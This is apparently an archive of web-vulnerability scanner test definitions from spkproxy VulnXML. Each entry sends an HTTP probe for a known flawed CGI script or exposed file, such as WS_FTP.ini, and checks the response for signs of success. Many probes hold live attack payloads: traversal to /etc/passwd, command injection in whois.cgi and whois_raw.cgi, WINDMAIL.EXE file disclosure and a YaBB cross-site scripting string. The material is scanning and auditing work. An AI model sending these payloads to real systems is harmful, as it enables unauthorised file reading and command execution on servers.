if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1264.xml0100664000076500007650000000712207566204543021743 0ustar davedave (websendmail) "This CGI may allow attackers to execute arbitrary commands remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}websendmail HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1265.xml0100664000076500007650000000727007566204543021750 0ustar davedave (webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd) "This CGI allows attackers to read arbitrary files." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1266.xml0100664000076500007650000000713407566204543021750 0ustar davedave (webutil.pl) "This might be interesting... has been seen in web logs from another CGI scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webutil.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1267.xml0100664000076500007650000000713607566204543021753 0ustar davedave (webutils.pl) "This might be interesting... has been seen in web logs from another CGI scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webutils.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1268.xml0100664000076500007650000000713307566204543021751 0ustar davedave (webwho.pl) "This might be interesting... has been seen in web logs from another CGI scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webwho.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1269.xml0100664000076500007650000000704107566204543021750 0ustar davedave (wguest.exe) "May be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wguest.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1270.xml0100664000076500007650000000717607566204543021751 0ustar davedave (whois.cgi?action=load&whois=%3Bid) "This script allows commands to be executed remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}whois.cgi?action=load&whois=%3Bid HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ uid= 200 uid= 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1271.xml0100664000076500007650000000724407566204543021746 0ustar davedave (whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd) "The whois.cgi allows any command to be executed on the system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1272.xml0100664000076500007650000000726007566204543021745 0ustar davedave (whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd) "The whois.cgi allows any command to be executed on the system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1273.xml0100664000076500007650000000725507566204543021752 0ustar davedave (whois_raw.cgi?fqdn=%0Acat%20/etc/passwd) "Allows attacker to view any file (and possibly execute commands). Upgrade to latest version" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1274.xml0100664000076500007650000000723307566204543021747 0ustar davedave (windmail) "Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}windmail HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1275.xml0100664000076500007650000000724707566204543021755 0ustar davedave (windmail.exe) "Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}windmail.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1276.xml0100664000076500007650000000716507566204543021755 0ustar davedave (WINDMAIL.EXE?%20-n%20c:\boot.ini%) "WINDMAIL.EXE can read arbitrary files" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}WINDMAIL.EXE?%20-n%20c:\boot.ini% HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1277.xml0100664000076500007650000000724307566204543021753 0ustar davedave (WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\) "WINDMAIL.EXE can read arbitrary files" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1278.xml0100664000076500007650000000713007566204543021747 0ustar davedave (wrap) "This CGI lets users read any file with 755 perms. It should not be in the CGI directory." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wrap HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1279.xml0100664000076500007650000000711307566204543021751 0ustar davedave (wrap.cgi) "possible variation: comes with IRIX 6.2; allows to view directories" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wrap.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1280.xml0100664000076500007650000000706507566204543021747 0ustar davedave (WS_FTP.ini) "Can contain saved passwords for ftp sites" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}WS_FTP.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1281.xml0100664000076500007650000000706507566204543021750 0ustar davedave (ws_ftp.ini) "Can contain saved passwords for ftp sites" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ws_ftp.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1282.xml0100664000076500007650000000704207566204543021744 0ustar davedave (www-sql) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}www-sql HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1283.xml0100664000076500007650000000704107566204543021744 0ustar davedave (wwwadmin.pl) "Administration CGI?" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wwwadmin.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1284.xml0100664000076500007650000000706407566204543021752 0ustar davedave (wwwboard.cgi.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wwwboard.cgi.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1285.xml0100664000076500007650000000705207566204543021750 0ustar davedave (wwwboard.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wwwboard.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1286.xml0100664000076500007650000000705207566204543021751 0ustar davedave (wwwstats.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wwwstats.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1287.xml0100664000076500007650000000707407566204543021756 0ustar davedave (wwwthreads/3tvars.pm) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wwwthreads/3tvars.pm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1288.xml0100664000076500007650000000707607566204543021761 0ustar davedave (wwwthreads/w3tvars.pm) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wwwthreads/w3tvars.pm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1289.xml0100664000076500007650000000713207566204543021753 0ustar davedave (wwwwais) "Unisys web server wais search found." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wwwwais HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ UNISYS WEB SEARCH ENGINE 200 UNISYS WEB SEARCH ENGINE 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1290.xml0100664000076500007650000000724307566204543021746 0ustar davedave (wwwwais) "wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wwwwais HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1291.xml0100664000076500007650000000742107566204543021745 0ustar davedave (YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00) "This CGI lets users read any file with http daemon's permissions. Upgrade to latest version" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1292.xml0100664000076500007650000000757307566204543021756 0ustar davedave (YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>) "YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1293.xml0100664000076500007650000000730107566204543021744 0ustar davedave (zml.cgi?file=../../../../../../../../../../etc/passwd%00) "Ztreet Markup Language interpreter allows arbitrary file to be read remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}zml.cgi?file=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1294.xml0100664000076500007650000000702507566204543021750 0ustar davedave (zsh) "Shell found in CGI dir!" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}zsh HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-12.xml0100664000076500007650000000735407566204543021600 0ustar davedave (../../../../../../../../../../WINNT/system32/ipconfig.exe) "Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}../../../../../../../../../../WINNT/system32/ipconfig.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ IP Configuration 200 IP Configuration 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-13.xml0100664000076500007650000000735607566204543021603 0ustar davedave (NUL/../../../../../../../../../WINNT/system32/ipconfig.exe) "Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}NUL/../../../../../../../../../WINNT/system32/ipconfig.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ IP Configuration 200 IP Configuration 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1468.xml0100664000076500007650000000725407566204543021757 0ustar davedave (tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\) "This CGI allows attackers to execute arbitrary commands on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot\.ini 200 boot\.ini 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1469.xml0100664000076500007650000000715207566204543021755 0ustar davedave (/_vti_pvt/doctodep.btr) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}/_vti_pvt/doctodep.btr HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1470.xml0100664000076500007650000000712207566204543021742 0ustar davedave (cfgwiz.exe) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the 